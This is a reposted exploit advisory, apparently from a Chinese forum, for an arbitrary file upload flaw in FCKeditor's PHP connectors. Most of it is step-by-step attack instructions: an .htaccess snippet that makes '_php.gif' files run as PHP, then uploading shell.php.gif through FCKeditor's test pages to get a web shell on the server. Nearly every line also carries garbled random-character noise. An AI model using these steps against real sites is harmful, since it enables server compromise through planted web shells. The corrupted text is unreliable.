FCKeditor所有php版本Upload上传漏洞0 e( F3 A) b8 j9 d
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
. j% F* p% l% q# ]) j7 k减小字体 增大字体
" }* N2 I/ a7 @" m6 y[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
* h; f& t1 f2 A; @" N) c' O[+] Date: 20112 {+ w [- w$ ]1 v5 t- k5 b
[+] Author : sinesafe.cn
* Z0 [# Z" g3 k[+] Website : WwW.sinesafe.cn7 ?- H' ?+ r; |0 Z9 a# H( b
———————————————————/ S- N' t J- q9 A
1.create a htaccess file:
8 q2 [7 P1 ~0 d) P4 gcode:% W! v* y s8 M6 ^: T
<FilesMatch “_php.gif”>
0 c& `/ N1 `5 L% `9 I) @5 [& nSetHandler application/x-httpd-php
" D6 N' v0 u4 h% b</FilesMatch>/ H" L' B4 d6 F) ?( c& C
- J1 H* X6 V$ O; V. W# k2.Now upload this htaccess with FCKeditor.
" d% R: Y- P2 l6 a: F8 Q# L
5 ]/ M1 J. ]5 F$ Ihttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html8 F0 y5 o+ o; ? k. Z, m
# q2 b) v, e# |http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
5 r4 V6 r# h2 y1 [# \0 m
5 x& P2 O! U7 v @4 {/ y———————————————————————————————-9 `3 U z; Z2 j) F/ r
3.Now upload shell.php.gif with FCKeditor.9 j# ]1 r" k$ E3 f. f( @0 @7 ]3 @
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically." G% M9 I- K& O( m
5.http://www.sinesafe.cn/anything/shell_php.gif
. N4 V2 V# I' i+ M1 t# q e6.Now shell is available from server. |
6 s$ E& k( W) w5 |. d- n( u
# N( v9 W. l3 P- a" ~7 c* j
+ y& [4 v [3 l1 {: N5 V5 {9 ?! _
|
发表于 2013-10-27 17:25:21
收藏
支持
反对